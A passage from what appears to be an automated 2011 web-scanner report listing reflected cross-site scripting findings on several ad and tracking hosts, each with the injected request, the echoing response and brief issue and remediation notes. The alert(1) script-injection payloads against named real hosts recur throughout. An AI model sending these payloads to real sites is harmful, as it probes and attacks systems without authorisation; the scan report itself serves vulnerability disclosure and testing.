Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196915f9<script>alert(1)</script>521310be6bf", c15:"", c16:"", r:""});



5.51. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the script, which is served as application/x-javascript. The payload d9079<script>alert(1)</script>19388ce5eb8 was submitted in the c15 parameter and echoed without encoding.

As for the c1 parameter in 5.49: the tag is inert inside a string literal, so this shows missing encoding of < and >; an unescaped double quote or backslash is the breakout to test by hand for injection into the script itself, and the tag only renders as HTML in a content-sniffing client, since no X-Content-Type-Options: nosniff header is sent.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15=d9079<script>alert(1)</script>19388ce5eb8 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"d9079<script>alert(1)</script>19388ce5eb8", c16:"", r:""});



5.52. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the script, which is served as application/x-javascript. The payload 1ffa1<script>alert(1)</script>a6c0eeea5f1 was submitted in the c2 parameter and echoed without encoding.

As for the c1 parameter in 5.49: the tag is inert inside a string literal, so this shows missing encoding of < and >; an unescaped double quote or backslash is the breakout to test by hand for injection into the script itself, and the tag only renders as HTML in a content-sniffing client, since no X-Content-Type-Options: nosniff header is sent.

Request

GET /beacon.js?c1=8&c2=21131ffa1<script>alert(1)</script>a6c0eeea5f1&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"21131ffa1<script>alert(1)</script>a6c0eeea5f1", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.53. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the script, which is served as application/x-javascript. The payload 93274<script>alert(1)</script>f68b1f5e88b was submitted in the c3 parameter and echoed without encoding.

As for the c1 parameter in 5.49: the tag is inert inside a string literal, so this shows missing encoding of < and >; an unescaped double quote or backslash is the breakout to test by hand for injection into the script itself, and the tag only renders as HTML in a content-sniffing client, since no X-Content-Type-Options: nosniff header is sent.

Request

GET /beacon.js?c1=8&c2=2113&c3=2093274<script>alert(1)</script>f68b1f5e88b&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"2093274<script>alert(1)</script>f68b1f5e88b", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.54. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 85f3a<script>alert(1)</script>fd4bc89f66e was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=483785f3a<script>alert(1)</script>fd4bc89f66e&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"483785f3a<script>alert(1)</script>fd4bc89f66e", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.55. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1983e<script>alert(1)</script>b250d769c8e was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=348721983e<script>alert(1)</script>b250d769c8e&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"348721983e<script>alert(1)</script>b250d769c8e", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.56. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9428f<script>alert(1)</script>87b9579e419 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=9428f<script>alert(1)</script>87b9579e419&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"9428f<script>alert(1)</script>87b9579e419", c10:"205196", c15:"", c16:"", r:""});



5.57. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 4d8c4<script>alert(1)</script>fd80bf050f8 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_274074675974d8c4<script>alert(1)</script>fd80bf050f8&pid=c7be9c39-b00b-4e4a-9ba7-a7008d2ad56b&s=300x250&f=1.19&cid=&url=http%3A%2F%2Fwww.huffingtonpost.com%2F%3Ficid%3Dnavbar_huffpo_main5 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=b884589a-9f2b-4c96-8991-596a4f766c29; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304557173; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_274074675974d8c4<script>alert(1)</script>fd80bf050f8({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAD2OvU7DMBRGT9qkde1AJAod-e3AYok4IU12V
...[SNIP]...

5.58. http://c.aol.com/read/get_topics [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.aol.com
Path:   /read/get_topics

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 68e91<script>alert(1)</script>d00482f33ea was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /read/get_topics?callback=jQuery1509592739215586334_130457509437568e91<script>alert(1)</script>d00482f33ea&channel_id=2&topic_id=19931896&topic_id=19932040&topic_id=19931885&topic_id=19930667&topic_id=19931276&topic_id=19931747&topic_id=19931406&topic_id=19931226&version=1&_=1304575104324 HTTP/1.1
Host: c.aol.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:59:06 GMT
Content-Length: 6439

jQuery1509592739215586334_130457509437568e91<script>alert(1)</script>d00482f33ea({
"topicList" : [ {
"type" : "article",
"createdTime" : "2011-05-05T00:30:13.000+0000",
"ndaysViews" : 0,
"viewCount" : 0,
"title" : "Survey: Most Americans Underestimate Retirem
...[SNIP]...

5.59. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /cm/js/10295-119241-2568-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65460"-alert(1)-"44c1b558e46 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cm/js/10295-119241-2568-4?mpt=59915460965460"-alert(1)-"44c1b558e46&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link= HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=17671:21707

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:40:10 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=59915460965460"-alert(1)-"44c1b558e46&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d
...[SNIP]...

5.60. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /cm/js/10295-119241-2568-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee58"%3balert(1)//1bf6f78cd31 was submitted in the mpvc parameter. This input was echoed as 1ee58";alert(1)//1bf6f78cd31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cm/js/10295-119241-2568-4?mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=1ee58"%3balert(1)//1bf6f78cd31 HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=17671:21707

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:40:22 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=1ee58";alert(1)//1bf6f78cd31http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/
...[SNIP]...

5.61. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 597ce"%3balert(1)//1b506363a98 was submitted in the mpck parameter. This input was echoed as 597ce";alert(1)//1b506363a98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F10295-119241-2568-4%3Fmpt%3D599154609597ce"%3balert(1)//1b506363a98&mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link= HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=10295:2568/17671:21707

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:39:54 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609597ce";alert(1)//1b506363a98&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d
...[SNIP]...

5.62. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95ff2"%3balert(1)//a4f03f74c1f was submitted in the mpvc parameter. This input was echoed as 95ff2";alert(1)//a4f03f74c1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F10295-119241-2568-4%3Fmpt%3D599154609&mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=95ff2"%3balert(1)//a4f03f74c1f HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=10295:2568/17671:21707

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:39:56 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=95ff2";alert(1)//a4f03f74c1fhttp://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/
...[SNIP]...

5.63. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 977b3<script>alert(1)</script>5107276f391 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

